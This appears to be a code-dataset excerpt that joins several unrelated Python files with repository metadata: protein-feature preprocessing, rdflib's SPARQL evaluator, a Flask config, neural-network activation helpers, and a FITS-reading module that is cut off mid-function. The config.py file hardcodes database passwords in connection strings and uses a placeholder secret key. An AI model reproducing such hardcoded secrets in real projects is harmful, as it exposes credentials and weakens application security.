num_msa = np.reshape(parsed_features["num_alignments"].astype(np.int32), (-1,))[0]
else:
num_msa = 0
if key is not None and "key" in features:
parsed_features["key"] = [key] # Expand dims from () to (1,).
for k, v in parsed_features.items():
new_shape = feature_shape(
feature_name=k,
num_residues=num_residues,
msa_length=num_msa,
num_templates=num_template,
features=features)
new_shape_size = 1
for dim in new_shape:
new_shape_size *= dim
if np.size(v) != new_shape_size:
raise ValueError("the size of feature {} ({}) could not be reshaped into {}"
"".format(k, np.size(v), new_shape))
if "template" not in k:
if np.size(v) <= 0:
raise ValueError("The feature {} is not empty.".format(k))
parsed_features[k] = np.reshape(v, new_shape)
return parsed_features
def _make_features_metadata(feature_names):
"""Makes a feature name to type and shape mapping from a list of names."""
required_features = ["sequence", "domain_name", "template_domain_names"]
feature_names = list(set(feature_names) - set(required_features))
features_metadata = {name: FEATURES[name] for name in feature_names}
return features_metadata
def np_to_array_dict(np_example, features):
"""Creates dict of arrays."""
features_metadata = _make_features_metadata(features)
array_dict = {k: v for k, v in np_example.items() if k in features_metadata}
if "template_domain_names" in np_example:
num_template = len(np_example["template_domain_names"])
else:
num_template = 0
array_dict = parse_reshape_logic(array_dict, features_metadata, num_template)
array_dict['template_mask'] = np.ones([num_template], np.float32)
return array_dict
def make_data_config(config, num_res):
"""Makes a data config for the input pipeline."""
cfg = copy.deepcopy(config.data)
feature_names = cfg.common.unsupervised_features
if cfg.common.use_templates:
feature_names += cfg.common.template_features
with cfg.unlocked():
cfg.eval.crop_size = num_res
return cfg, feature_names
def custom_padding(config, arrays, dims):
"""Pad array to fixed size."""
step_size = config.seq_length
res_length = arrays[0].shape[dims[0]]
padding_size = step_size - res_length
for i, arr in enumerate(arrays):
if dims[i] == -1:
continue
extra_array_shape = list(arr.shape)
extra_array_shape[dims[i]] = padding_size
extra_array = np.zeros(extra_array_shape, dtype=arr.dtype)
arrays[i] = np.concatenate((arr, extra_array), axis=dims[i])
return arrays
def process_features(raw_features, config, global_config):
"""Preprocesses NumPy feature dict using pipeline."""
num_res = int(raw_features['seq_length'][0])
cfg, feature_names = make_data_config(config, num_res=num_res)
if 'deletion_matrix_int' in raw_features:
raw_features['deletion_matrix'] = (raw_features.pop('deletion_matrix_int').astype(np.float32))
array_dict = np_to_array_dict(np_example=raw_features, features=feature_names)
features = process_arrays_from_config(array_dict, cfg)
features = {k: v for k, v in features.items() if v.dtype != 'O'}
extra_msa_length = global_config.extra_msa_length
ori_res_length = features["target_feat"].shape[1]
aatype = features["aatype"]
residue_index = features["residue_index"]
for key in ["extra_msa", "extra_has_deletion", "extra_deletion_value", "extra_msa_mask"]:
features[key] = features[key][:, :extra_msa_length]
input_keys = ['target_feat', 'msa_feat', 'msa_mask', 'seq_mask', 'aatype', 'template_aatype',
'template_all_atom_masks', 'template_all_atom_positions', 'template_mask',
'template_pseudo_beta_mask', 'template_pseudo_beta', 'template_sum_probs',
'extra_msa', 'extra_has_deletion', 'extra_deletion_value', 'extra_msa_mask',
'residx_atom37_to_atom14', 'atom37_atom_exists', 'residue_index']
arrays = [features[key] for key in input_keys]
dims = [1, 2, 2, 1, 1, 2, 2, 2, -1, 2, 2, -1, 2, 2, 2, 2, 1, 1, 1]
arrays = custom_padding(global_config, arrays, dims)
arrays = [array.astype(np.float16) if array.dtype == "float64" else array for array in arrays]
arrays = [array.astype(np.float16) if array.dtype == "float32" else array for array in arrays]
return arrays, aatype, residue_index, ori_res_length
| 39
| 116
| 0.68405
|
34fe41e9038d0d873911be7cfdd5e5744c18cbd7
| 15,986
|
py
|
Python
|
rdflib/plugins/sparql/evaluate.py
|
tonyfast/rdflib
|
e4fe0fdbd4de7e1183418f302315b51a14602e03
|
[
"BSD-3-Clause"
] | 2
|
2021-02-06T17:36:05.000Z
|
2021-04-21T07:33:39.000Z
|
rdflib/plugins/sparql/evaluate.py
|
pragya16067/rdflib
|
6b5bd37ccc67bdec62d2e36d174eb7933b5020b2
|
[
"BSD-3-Clause"
] | 2
|
2020-05-09T15:03:57.000Z
|
2020-05-30T10:51:40.000Z
|
rdflib/plugins/sparql/evaluate.py
|
pragya16067/rdflib
|
6b5bd37ccc67bdec62d2e36d174eb7933b5020b2
|
[
"BSD-3-Clause"
] | 4
|
2020-05-08T08:36:19.000Z
|
2020-05-28T07:23:23.000Z
|
"""
These method recursively evaluate the SPARQL Algebra
evalQuery is the entry-point, it will setup context and
return the SPARQLResult object
evalPart is called on each level and will delegate to the right method
A rdflib.plugins.sparql.sparql.QueryContext is passed along, keeping
information needed for evaluation
A list of dicts (solution mappings) is returned, apart from GroupBy which may
also return a dict of list of dicts
"""
import collections
import itertools
import re
import requests
from pyparsing import ParseException
from rdflib import Variable, Graph, BNode, URIRef, Literal
from rdflib.plugins.sparql import CUSTOM_EVALS
from rdflib.plugins.sparql.parserutils import value
from rdflib.plugins.sparql.sparql import (
QueryContext,
AlreadyBound,
FrozenBindings,
Bindings,
SPARQLError,
)
from rdflib.plugins.sparql.evalutils import (
_filter,
_eval,
_join,
_diff,
_minus,
_fillTemplate,
_ebv,
_val,
)
from rdflib.plugins.sparql.aggregates import Aggregator
from rdflib.plugins.sparql import parser
def evalBGP(ctx, bgp):
"""
A basic graph pattern
"""
if not bgp:
yield ctx.solution()
return
s, p, o = bgp[0]
_s = ctx[s]
_p = ctx[p]
_o = ctx[o]
for ss, sp, so in ctx.graph.triples((_s, _p, _o)):
if None in (_s, _p, _o):
c = ctx.push()
else:
c = ctx
if _s is None:
c[s] = ss
try:
if _p is None:
c[p] = sp
except AlreadyBound:
continue
try:
if _o is None:
c[o] = so
except AlreadyBound:
continue
for x in evalBGP(c, bgp[1:]):
yield x
def evalExtend(ctx, extend):
# TODO: Deal with dict returned from evalPart from GROUP BY
for c in evalPart(ctx, extend.p):
try:
e = _eval(extend.expr, c.forget(ctx, _except=extend._vars))
if isinstance(e, SPARQLError):
raise e
yield c.merge({extend.var: e})
except SPARQLError:
yield c
def evalLazyJoin(ctx, join):
"""
A lazy join will push the variables bound
in the first part to the second part,
essentially doing the join implicitly
hopefully evaluating much fewer triples
"""
for a in evalPart(ctx, join.p1):
c = ctx.thaw(a)
for b in evalPart(c, join.p2):
yield b.merge(a) # merge, as some bindings may have been forgotten
def evalJoin(ctx, join):
# TODO: Deal with dict returned from evalPart from GROUP BY
# only ever for join.p1
if join.lazy:
return evalLazyJoin(ctx, join)
else:
a = evalPart(ctx, join.p1)
b = set(evalPart(ctx, join.p2))
return _join(a, b)
def evalUnion(ctx, union):
branch1_branch2 = []
for x in evalPart(ctx, union.p1):
branch1_branch2.append(x)
for x in evalPart(ctx, union.p2):
branch1_branch2.append(x)
return branch1_branch2
def evalMinus(ctx, minus):
a = evalPart(ctx, minus.p1)
b = set(evalPart(ctx, minus.p2))
return _minus(a, b)
def evalLeftJoin(ctx, join):
# import pdb; pdb.set_trace()
for a in evalPart(ctx, join.p1):
ok = False
c = ctx.thaw(a)
for b in evalPart(c, join.p2):
if _ebv(join.expr, b.forget(ctx)):
ok = True
yield b
if not ok:
# we've cheated, the ctx above may contain
# vars bound outside our scope
# before we yield a solution without the OPTIONAL part
# check that we would have had no OPTIONAL matches
# even without prior bindings...
p1_vars = join.p1._vars
if p1_vars is None or not any(
_ebv(join.expr, b)
for b in evalPart(ctx.thaw(a.remember(p1_vars)), join.p2)
):
yield a
def evalFilter(ctx, part):
# TODO: Deal with dict returned from evalPart!
for c in evalPart(ctx, part.p):
if _ebv(
part.expr,
c.forget(ctx, _except=part._vars) if not part.no_isolated_scope else c,
):
yield c
def evalGraph(ctx, part):
if ctx.dataset is None:
raise Exception(
"Non-conjunctive-graph doesn't know about "
+ "graphs. Try a query without GRAPH."
)
ctx = ctx.clone()
graph = ctx[part.term]
if graph is None:
for graph in ctx.dataset.contexts():
# in SPARQL the default graph is NOT a named graph
if graph == ctx.dataset.default_context:
continue
c = ctx.pushGraph(graph)
c = c.push()
graphSolution = [{part.term: graph.identifier}]
for x in _join(evalPart(c, part.p), graphSolution):
yield x
else:
c = ctx.pushGraph(ctx.dataset.get_context(graph))
for x in evalPart(c, part.p):
yield x
def evalValues(ctx, part):
for r in part.p.res:
c = ctx.push()
try:
for k, v in r.items():
if v != "UNDEF":
c[k] = v
except AlreadyBound:
continue
yield c.solution()
def evalMultiset(ctx, part):
if part.p.name == "values":
return evalValues(ctx, part)
return evalPart(ctx, part.p)
def evalPart(ctx, part):
# try custom evaluation functions
for name, c in CUSTOM_EVALS.items():
try:
return c(ctx, part)
except NotImplementedError:
pass # the given custome-function did not handle this part
if part.name == "BGP":
# Reorder triples patterns by number of bound nodes in the current ctx
# Do patterns with more bound nodes first
triples = sorted(
part.triples, key=lambda t: len([n for n in t if ctx[n] is None])
)
return evalBGP(ctx, triples)
elif part.name == "Filter":
return evalFilter(ctx, part)
elif part.name == "Join":
return evalJoin(ctx, part)
elif part.name == "LeftJoin":
return evalLeftJoin(ctx, part)
elif part.name == "Graph":
return evalGraph(ctx, part)
elif part.name == "Union":
return evalUnion(ctx, part)
elif part.name == "ToMultiSet":
return evalMultiset(ctx, part)
elif part.name == "Extend":
return evalExtend(ctx, part)
elif part.name == "Minus":
return evalMinus(ctx, part)
elif part.name == "Project":
return evalProject(ctx, part)
elif part.name == "Slice":
return evalSlice(ctx, part)
elif part.name == "Distinct":
return evalDistinct(ctx, part)
elif part.name == "Reduced":
return evalReduced(ctx, part)
elif part.name == "OrderBy":
return evalOrderBy(ctx, part)
elif part.name == "Group":
return evalGroup(ctx, part)
elif part.name == "AggregateJoin":
return evalAggregateJoin(ctx, part)
elif part.name == "SelectQuery":
return evalSelectQuery(ctx, part)
elif part.name == "AskQuery":
return evalAskQuery(ctx, part)
elif part.name == "ConstructQuery":
return evalConstructQuery(ctx, part)
elif part.name == "ServiceGraphPattern":
return evalServiceQuery(ctx, part)
# raise Exception('ServiceGraphPattern not implemented')
elif part.name == "DescribeQuery":
raise Exception("DESCRIBE not implemented")
else:
raise Exception("I dont know: %s" % part.name)
def evalServiceQuery(ctx, part):
res = {}
match = re.match(
"^service <(.*)>[ \n]*{(.*)}[ \n]*$",
part.get("service_string", ""),
re.DOTALL | re.I,
)
if match:
service_url = match.group(1)
service_query = _buildQueryStringForServiceCall(ctx, match)
query_settings = {"query": service_query, "output": "json"}
headers = {
"accept": "application/sparql-results+json",
"user-agent": "rdflibForAnUser",
}
# GET is easier to cache so prefer that if the query is not to long
if len(service_query) < 600:
response = requests.get(service_url, params=query_settings, headers=headers)
else:
response = requests.post(
service_url, params=query_settings, headers=headers
)
if response.status_code == 200:
json = response.json()
variables = res["vars_"] = json["head"]["vars"]
# or just return the bindings?
res = json["results"]["bindings"]
if len(res) > 0:
for r in res:
for bound in _yieldBindingsFromServiceCallResult(ctx, r, variables):
yield bound
else:
raise Exception(
"Service: %s responded with code: %s", service_url, response.status_code
)
"""
Build a query string to be used by the service call.
It is supposed to pass in the existing bound solutions.
Re-adds prefixes if added and sets the base.
Wraps it in select if needed.
"""
def _buildQueryStringForServiceCall(ctx, match):
service_query = match.group(2)
try:
parser.parseQuery(service_query)
except ParseException:
# This could be because we don't have a select around the service call.
service_query = "SELECT REDUCED * WHERE {" + service_query + "}"
for p in ctx.prologue.namespace_manager.store.namespaces():
service_query = "PREFIX " + p[0] + ":" + p[1].n3() + " " + service_query
# re add the base if one was defined
base = ctx.prologue.base
if base is not None and len(base) > 0:
service_query = "BASE <" + base + "> " + service_query
sol = ctx.solution()
if len(sol) > 0:
variables = " ".join(map(lambda v: v.n3(), sol))
variables_bound = " ".join(map(lambda v: ctx.get(v).n3(), sol))
service_query = (
service_query + "VALUES (" + variables + ") {(" + variables_bound + ")}"
)
return service_query
def _yieldBindingsFromServiceCallResult(ctx, r, variables):
res_dict = {}
for var in variables:
if var in r and r[var]:
if r[var]["type"] == "uri":
res_dict[Variable(var)] = URIRef(r[var]["value"])
elif r[var]["type"] == "bnode":
res_dict[Variable(var)] = BNode(r[var]["value"])
elif r[var]["type"] == "literal" and "datatype" in r[var]:
res_dict[Variable(var)] = Literal(
r[var]["value"], datatype=r[var]["datatype"]
)
elif r[var]["type"] == "literal" and "xml:lang" in r[var]:
res_dict[Variable(var)] = Literal(
r[var]["value"], lang=r[var]["xml:lang"]
)
yield FrozenBindings(ctx, res_dict)
def evalGroup(ctx, group):
"""
http://www.w3.org/TR/sparql11-query/#defn_algGroup
"""
# grouping should be implemented by evalAggregateJoin
return evalPart(ctx, group.p)
def evalAggregateJoin(ctx, agg):
# import pdb ; pdb.set_trace()
p = evalPart(ctx, agg.p)
# p is always a Group, we always get a dict back
group_expr = agg.p.expr
res = collections.defaultdict(lambda: Aggregator(aggregations=agg.A))
if group_expr is None:
# no grouping, just COUNT in SELECT clause
# get 1 aggregator for counting
aggregator = res[True]
for row in p:
aggregator.update(row)
else:
for row in p:
# determine right group aggregator for row
k = tuple(_eval(e, row, False) for e in group_expr)
res[k].update(row)
# all rows are done; yield aggregated values
for aggregator in res.values():
yield FrozenBindings(ctx, aggregator.get_bindings())
# there were no matches
if len(res) == 0:
yield FrozenBindings(ctx)
def evalOrderBy(ctx, part):
res = evalPart(ctx, part.p)
for e in reversed(part.expr):
reverse = bool(e.order and e.order == "DESC")
res = sorted(
res, key=lambda x: _val(value(x, e.expr, variables=True)), reverse=reverse
)
return res
def evalSlice(ctx, slice):
res = evalPart(ctx, slice.p)
return itertools.islice(
res,
slice.start,
slice.start + slice.length if slice.length is not None else None,
)
def evalReduced(ctx, part):
"""apply REDUCED to result
REDUCED is not as strict as DISTINCT, but if the incoming rows were sorted
it should produce the same result with limited extra memory and time per
incoming row.
"""
# This implementation uses a most recently used strategy and a limited
# buffer size. It relates to a LRU caching algorithm:
# https://en.wikipedia.org/wiki/Cache_algorithms#Least_Recently_Used_.28LRU.29
MAX = 1
# TODO: add configuration or determine "best" size for most use cases
# 0: No reduction
# 1: compare only with the last row, almost no reduction with
# unordered incoming rows
# N: The greater the buffer size the greater the reduction but more
# memory and time are needed
# mixed data structure: set for lookup, deque for append/pop/remove
mru_set = set()
mru_queue = collections.deque()
for row in evalPart(ctx, part.p):
if row in mru_set:
# forget last position of row
mru_queue.remove(row)
else:
# row seems to be new
yield row
mru_set.add(row)
if len(mru_set) > MAX:
# drop the least recently used row from buffer
mru_set.remove(mru_queue.pop())
# put row to the front
mru_queue.appendleft(row)
def evalDistinct(ctx, part):
res = evalPart(ctx, part.p)
done = set()
for x in res:
if x not in done:
yield x
done.add(x)
def evalProject(ctx, project):
res = evalPart(ctx, project.p)
return (row.project(project.PV) for row in res)
def evalSelectQuery(ctx, query):
res = {}
res["type_"] = "SELECT"
res["bindings"] = evalPart(ctx, query.p)
res["vars_"] = query.PV
return res
def evalAskQuery(ctx, query):
res = {}
res["type_"] = "ASK"
res["askAnswer"] = False
for x in evalPart(ctx, query.p):
res["askAnswer"] = True
break
return res
def evalConstructQuery(ctx, query):
template = query.template
if not template:
# a construct-where query
template = query.p.p.triples # query->project->bgp ...
graph = Graph()
for c in evalPart(ctx, query.p):
graph += _fillTemplate(template, c)
res = {}
res["type_"] = "CONSTRUCT"
res["graph"] = graph
return res
def evalQuery(graph, query, initBindings, base=None):
initBindings = dict((Variable(k), v) for k, v in initBindings.items())
ctx = QueryContext(graph, initBindings=initBindings)
ctx.prologue = query.prologue
main = query.algebra
if main.datasetClause:
if ctx.dataset is None:
raise Exception(
"Non-conjunctive-graph doesn't know about "
+ "graphs! Try a query without FROM (NAMED)."
)
ctx = ctx.clone() # or push/pop?
firstDefault = False
for d in main.datasetClause:
if d.default:
if firstDefault:
# replace current default graph
dg = ctx.dataset.get_context(BNode())
ctx = ctx.pushGraph(dg)
firstDefault = True
ctx.load(d.default, default=True)
elif d.named:
g = d.named
ctx.load(g, default=False)
return evalPart(ctx, main)
| 27.753472
| 88
| 0.584511
|
fe7143d233af2a0e00b176efefe591e23e5f4219
| 785
|
py
|
Python
|
config.py
|
Alikhalid2020/Pitches
|
ff703163ce3050ea4a2266cf777828deb1c386fe
|
[
"MIT"
] | 1
|
2021-01-27T22:14:48.000Z
|
2021-01-27T22:14:48.000Z
|
config.py
|
Alikhalid2020/Pitches
|
ff703163ce3050ea4a2266cf777828deb1c386fe
|
[
"MIT"
] | null | null | null |
config.py
|
Alikhalid2020/Pitches
|
ff703163ce3050ea4a2266cf777828deb1c386fe
|
[
"MIT"
] | null | null | null |
import os
class Config:
SQLALCHEMY_TRACK_MODIFICATIONS=False
SECRET_KEY='SECRET_KEY'
MAIL_SERVER = 'smtp.googlemail.com'
MAIL_PORT = 587
MAIL_USE_TLS = True
MAIL_USERNAME = os.environ.get("MAIL_USERNAME")
MAIL_PASSWORD = os.environ.get("MAIL_PASSWORD")
UPLOADED_PHOTOS_DEST ='app/static/photos'
class ProdConfig(Config):
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL')
class TestConfig(Config):
SQLALCHEMY_DATABASE_URI = 'postgresql+psycopg2://Morninga:Alikhalid3436@localhost/pitches'
class DevConfig(Config):
SQLALCHEMY_DATABASE_URI = 'postgresql+psycopg2://morninga:Alikhalid3436@localhost/pitches'
DEBUG = True
config_options = {
'development':DevConfig,
'production':ProdConfig,
'test':TestConfig
}
| 23.787879
| 94
| 0.742675
|
7565d73bfc308a0951e3a17d377c056443c2fdec
| 1,757
|
py
|
Python
|
01-Neural Networks and Deep Learning/week4/dnn_utils_v2.py
|
gaojiaxi/Coursera-Deep-Learning-deeplearning.ai
|
75a2026f1241ec5e7d24583740dc2f9d4f307d41
|
[
"MIT"
] | null | null | null |
01-Neural Networks and Deep Learning/week4/dnn_utils_v2.py
|
gaojiaxi/Coursera-Deep-Learning-deeplearning.ai
|
75a2026f1241ec5e7d24583740dc2f9d4f307d41
|
[
"MIT"
] | null | null | null |
01-Neural Networks and Deep Learning/week4/dnn_utils_v2.py
|
gaojiaxi/Coursera-Deep-Learning-deeplearning.ai
|
75a2026f1241ec5e7d24583740dc2f9d4f307d41
|
[
"MIT"
] | null | null | null |
import numpy as np
def sigmoid(Z):
"""
Implements the sigmoid activation in numpy
Arguments:
Z -- numpy array of any shape
Returns:
A -- output of sigmoid(z), same shape as Z
cache -- returns Z as well, useful during backpropagation
"""
A = 1/(1+np.exp(-Z))
cache = Z
return A, cache
def relu(Z):
"""
Implement the RELU function.
Arguments:
Z -- Output of the linear layer, of any shape
Returns:
A -- Post-activation parameter, of the same shape as Z
cache -- a python dictionary containing "A" ; stored for computing the backward pass efficiently
"""
A = np.maximum(0, Z)
assert(A.shape == Z.shape)
cache = Z
return A, cache
def relu_backward(dA, cache):
"""
Implement the backward propagation for a single RELU unit.
Arguments:
dA -- post-activation gradient, of any shape
cache -- 'Z' where we store for computing backward propagation efficiently
Returns:
dZ -- Gradient of the cost with respect to Z
"""
Z = cache
dZ = np.array(dA, copy=True) # just converting dz to a correct object.
# When z <= 0, you should set dz to 0 as well.
dZ[Z <= 0] = 0
assert (dZ.shape == Z.shape)
return dZ
def sigmoid_backward(dA, cache):
"""
Implement the backward propagation for a single SIGMOID unit.
Arguments:
dA -- post-activation gradient, of any shape
cache -- 'Z' where we store for computing backward propagation efficiently
Returns:
dZ -- Gradient of the cost with respect to Z
"""
Z = cache
s = 1/(1+np.exp(-Z))
dZ = dA * s * (1-s)
assert (dZ.shape == Z.shape)
return dZ
| 21.168675
| 100
| 0.598748
|
255fb2b69560b308ec6f870667c35274b6352ea2
| 56,125
|
py
|
Python
|
apero/io/drs_fits.py
|
njcuk9999/apero-drs
|
83b043e9f277a011b03e0227c77307961b200901
|
[
"MIT"
] | 1
|
2021-03-09T17:49:31.000Z
|
2021-03-09T17:49:31.000Z
|
apero/io/drs_fits.py
|
njcuk9999/apero-drs
|
83b043e9f277a011b03e0227c77307961b200901
|
[
"MIT"
] | 43
|
2020-10-06T18:42:24.000Z
|
2022-03-28T21:23:10.000Z
|
apero/io/drs_fits.py
|
njcuk9999/apero-drs
|
83b043e9f277a011b03e0227c77307961b200901
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
# CODE NAME HERE
# CODE DESCRIPTION HERE
Created on 2019-03-21 at 11:36
@author: cook
"""
import numpy as np
from astropy.io import fits
from astropy.table import Table
from astropy.time import Time, TimeDelta
from astropy import version as av
from astropy import units as uu
import os
import warnings
import traceback
from apero.core import constants
from apero.core.core import drs_log
from apero import lang
from apero.io import drs_table
from apero.io import drs_lock
from apero.io import drs_path
from apero.io import drs_text
# =============================================================================
# Define variables
# =============================================================================
__NAME__ = 'io.drs_fits.py'
__INSTRUMENT__ = 'None'
# Get constants
Constants = constants.load(__INSTRUMENT__)
# Get version and author
__version__ = Constants['DRS_VERSION']
__author__ = Constants['AUTHORS']
__date__ = Constants['DRS_DATE']
__release__ = Constants['DRS_RELEASE']
# get param dict
ParamDict = constants.ParamDict
# Get Logging function
WLOG = drs_log.wlog
# alias pcheck
pcheck = drs_log.find_param
# Get the text types
TextEntry = lang.drs_text.TextEntry
# TODO: This should be changed for astropy -> 2.0.1
# bug that hdu.scale has bug before version 2.0.1
if av.major < 2 or (av.major == 2 and av.minor < 1):
SCALEARGS = dict(bscale=(1.0 + 1.0e-8), bzero=1.0e-8)
else:
SCALEARGS = dict(bscale=1, bzero=0)
# =============================================================================
# Define classes
# =============================================================================
# noinspection PyCompatibility
class Header(fits.Header):
"""
Wrapper class for fits headers that allows us to add functionality.
- Stores temporary items with keys starting with '@@@'
- Only shows up through "[]" and "in" operations
- Can automatically convert NaN values to strings
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.__temp_items = {}
def __setitem__(self, key: str, item):
"""
Set a key with "item"
same as using: header[key] = item
:param key: str, the key to add to the header
:param item: object, the object to
:return: None
"""
# deal with key not being string
if isinstance(key, tuple):
if key[0].startswith('@@@'):
tmpkey = self.__get_temp_key(key[0])
self.__temp_items.__setitem__(tmpkey, item)
else:
# check for NaN values (and convert -- cannot put directly in)
nan_filtered = self.__nan_check(item)
# do the super __setitem__ on nan filtered item
super().__setitem__(key, nan_filtered)
# if key starts with @@@ add to temp items (without @@@)
if key.startswith('@@@'):
# use the __get_temp_key method to strip key
self.__temp_items.__setitem__(self.__get_temp_key(key), item)
# do not add empty keys
elif key == '':
pass
# else add normal keys
else:
# check for NaN values (and convert -- cannot put directly in)
nan_filtered = self.__nan_check(item)
# do the super __setitem__ on nan filtered item
super().__setitem__(key, nan_filtered)
def __getitem__(self, key: str):
"""
Get an "item" with key
same as using: item = header[key]
:param key: str, the key in the header to get item for
:return: the item in the header with key="key"
"""
# deal with key not being string
if isinstance(key, tuple):
if key[0].startswith('@@@'):
tmpkey = self.__get_temp_key(key[0])
return self.__temp_items.__getitem__(tmpkey)
else:
return super().__getitem__(key)
elif not isinstance(key, str):
return super().__getitem__(key)
# if key starts with @@@ get it from the temporary items storage
if key.startswith('@@@'):
return self.__temp_items.__getitem__(self.__get_temp_key(key))
# else get it from the normal storage location (in super)
else:
return super().__getitem__(key)
def __contains__(self, key: str):
"""
Whether key is in header
same as using: key in header
:param key: str, the key to search for in the header
:return:
"""
# deal with key not being str
if isinstance(key, tuple):
if key[0].startswith('@@@'):
tmpkey = self.__get_temp_key(key[0])
return self.__temp_items.__contains__(tmpkey)
else:
return super().__contains__(key)
elif not isinstance(key, str):
return super().__contains__(key)
# if key starts with @@@ then get it from the temp_items
if key.startswith('@@@'):
return self.__temp_items.__contains__(self.__get_temp_key(key))
# else just do the super contains
else:
return super().__contains__(key)
def copy(self, strip=False):
header = Header(super().copy(strip), copy=False)
header.__temp_items = self.__temp_items.copy()
return header
def to_fits_header(self, strip=True, nan_to_string=True):
header = super().copy(strip=strip)
if nan_to_string:
for key in list(header.keys()):
if isinstance(header[key], fits.header._HeaderCommentaryCards):
header[key] = header[key][0]
else:
header[key] = header[key]
return header
@staticmethod
def from_fits_header(fits_header):
return Header(fits_header, copy=True)
@staticmethod
def __get_temp_key(key):
return key[3:]
@staticmethod
def __nan_check(value):
if isinstance(value, float) and np.isnan(value):
return 'NaN'
elif isinstance(value, float) and np.isposinf(value):
return 'INF'
elif isinstance(value, float) and np.isneginf(value):
return '-INF'
elif type(value) == tuple:
return (Header.__nan_check(value[0]),) + value[1:]
else:
return value
# =============================================================================
# Define read functions
# =============================================================================
def id_drs_file(params, recipe, drs_file_sets, filename=None, nentries=None,
required=True, use_input_file=False):
func_name = __NAME__ + '.id_drs_file()'
# ----------------------------------------------------------------------
# deal with list vs no list for drs_file_sets
if isinstance(drs_file_sets, list):
pass
else:
drs_file_sets = [drs_file_sets]
# ----------------------------------------------------------------------
# storage
found = False
kinds = []
names = []
file_set = None
# ----------------------------------------------------------------------
# loop around file set
for file_set in drs_file_sets:
# get the names of the file_set
names.append(file_set.name)
# ------------------------------------------------------------------
# check we have entries
if len(file_set.fileset) == 0:
continue
# ------------------------------------------------------------------
# check we have a recipe set
if file_set.recipe is None:
file_set.recipe = recipe
# ------------------------------------------------------------------
# check we ahve a file set
if file_set.filename is None:
if filename is None:
WLOG(params, 'error', 'filename is not set')
else:
file_set.set_filename(filename)
# ------------------------------------------------------------------
# get the associated files with this generic drs file
fileset = list(file_set.fileset)
# ------------------------------------------------------------------
# loop around files
for drs_file in fileset:
# --------------------------------------------------------------
# debug
dargs = [str(drs_file)]
WLOG(params, 'debug', TextEntry('90-010-00001', args=dargs))
# --------------------------------------------------------------
# copy info from given_drs_file into drs_file
file_in = drs_file.copyother(file_set, recipe=recipe)
# --------------------------------------------------------------
# load the header for this kind
try:
# need to read the file header for this specific drs file
file_in.read_header(log=False)
# copy in hdict from file_set
# - this is the only way to get keys added from file that is
# read above
if file_set.hdict is not None:
for key in file_set.hdict:
file_in.header[key] = file_set.hdict[key]
# if exception occurs continue to next file
# (this is not the correct file)
except Exception as _:
continue
except SystemExit as _:
continue
# --------------------------------------------------------------
# check this file is valid
cond, _ = file_in.check_file()
# --------------------------------------------------------------
# if True we have found our file
if cond:
# ----------------------------------------------------------
found = True
# ----------------------------------------------------------
# load the data for this kind
cond1 = file_set.data is not None
cond2 = file_set.header is not None
# use the data if flagged and if possible (cond1 & cond2)
if use_input_file and cond1 and cond2:
# shallow copy data
file_in.data = file_set.data
# copy over header
file_in.header = file_set.header
else:
file_in.read_data()
# ----------------------------------------------------------
# append to list
kinds.append(file_in)
# ----------------------------------------------------------
# if we only want one entry break here
if nentries == 1:
break
# ----------------------------------------------------------------------
# deal with no files found
if len(kinds) == 0 and required:
# get header keys for info purposes
keys = ['KW_CCAS', 'KW_CREF', 'KW_OBSTYPE', 'KW_TARGET_TYPE',
'KW_OBJNAME']
argstr = ''
for key in keys:
if file_set is not None and file_set.header is not None:
value = file_set.get_key(key)
else:
value = None
argstr += '\t{0}: {1}\n'.format(key, value)
eargs = [' '.join(names), file_set.filename, argstr, func_name]
WLOG(params, 'error', TextEntry('00-010-00001', args=eargs))
# ----------------------------------------------------------------------
# return found and the drs_file instance
if len(kinds) == 0:
return found, kinds
elif nentries == None:
return found, kinds
elif nentries == 1:
return found, kinds[0]
else:
return found, kinds[:nentries]
# =============================================================================
# Define read functions
# =============================================================================
def readfits(params, filename, getdata=True, gethdr=False, fmt='fits-image',
ext=0, func=None, log=True, copy=False):
"""
The drs fits file read function
:param params: ParamDict, the parameter dictionary of constants
:param filename: string, the absolute path to the file
:param getdata: bool, whether to return data from "ext"
:param gethdr: bool, whether to return header from "ext"
:param fmt: str, format of data (either 'fits-image' or 'fits-table'
:param ext: int, the extension to open
:param func: str, function name of calling function (input function)
:type params: ParamDict
:type filename: str
:type getdata: bool
:type gethdr: bool
:type fmt: str
:type ext: int
:type func: str
:returns: if getdata and gethdr: returns data, header, if getdata return
data, if gethdr returns header.
if fmt 'fits-time' returns np.array for data and dictionary for
header, if fmt 'fits-table' returns astropy.table for data and
dictionary for header
"""
if func is None:
func_name = __NAME__ + '.readfits()'
else:
func_name = '{0} and {1}'.format(func, __NAME__ + '.readfits()')
# define allowed values of 'fmt'
allowed_formats = ['fits-image', 'fits-table', 'fits-multi']
# -------------------------------------------------------------------------
# deal with filename not existing
if not os.path.exists(filename):
# check directory exists
dirname = os.path.dirname(filename)
if not os.path.exists(dirname):
eargs = [dirname, os.path.basename(filename), func_name]
WLOG(params, 'error', TextEntry('01-001-00013', args=eargs))
else:
eargs = [os.path.basename(filename), dirname, func_name]
WLOG(params, 'error', TextEntry('01-001-00012', args=eargs))
# -------------------------------------------------------------------------
# deal with obtaining data
if fmt == 'fits-image':
data, header = _read_fitsimage(params, filename, getdata, gethdr, ext,
log=log)
elif fmt == 'fits-table':
data, header = _read_fitstable(params, filename, getdata, gethdr, ext,
log=log)
elif fmt == 'fits-multi':
data, header = _read_fitsmulti(params, filename, getdata, gethdr,
log=log)
else:
cfmts = ', '.join(allowed_formats)
eargs = [filename, fmt, cfmts, func_name]
WLOG(params, 'error', TextEntry('00-008-00019', args=eargs))
data, header = None, None
# -------------------------------------------------------------------------
# deal with copying
if copy:
data = np.array(data)
header = fits.Header(header)
# -------------------------------------------------------------------------
# deal with return
if getdata and gethdr:
return data, header
elif getdata:
return data
elif gethdr:
return header
else:
return None
def read_header(params, filename, ext=0, log=True):
func_name = __NAME__ + '.read_header()'
# try to open header
try:
header = fits.getheader(filename, ext=ext)
except Exception as e:
if log:
eargs = [os.path.basename(filename), ext, type(e), e, func_name]
WLOG(params, 'error', TextEntry('01-001-00010', args=eargs))
header = None
else:
raise e
# return header
return header
def _read_fitsmulti(params, filename, getdata, gethdr, log=True):
func_name = __NAME__ + '._read_fitsmulti()'
# attempt to open hdu of fits file
try:
hdulist = fits.open(filename)
except Exception as e:
eargs = [filename, type(e), e, func_name]
WLOG(params, 'error', TextEntry('01-001-00006', args=eargs))
